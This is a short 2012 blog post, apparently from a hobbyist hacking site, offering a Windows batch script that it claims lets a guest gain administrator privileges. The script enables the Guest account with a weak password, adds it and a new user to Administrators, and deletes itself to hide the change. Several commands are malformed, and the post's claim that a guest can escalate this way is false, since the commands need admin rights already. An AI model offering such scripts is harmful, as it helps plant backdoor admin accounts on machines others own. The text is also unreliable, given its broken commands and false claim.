Main » 2012 » July » 15 » How You Can Change a guest Account To administrator account
6:41 PM
How You Can Change a guest Account To administrator account

How You Can Change a guest Account To administrator account

Here is a another Post In This post we Change a guest account into administrator. The below code will allow a guest to be a admin . You will not be the actual admin but will get administrator privileges



To do this task first open Notepade ....!
after this copy and paste this code on Notepad...

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0



And save the file as "anyname.bat" . remember .bat is important.....

Now you need to execute it or run in the cmd screen.!

Views: 2842 | Added by: Roshan | Rating: 0.0/0
Total comments: 0
Name *:
Email *:
Code *: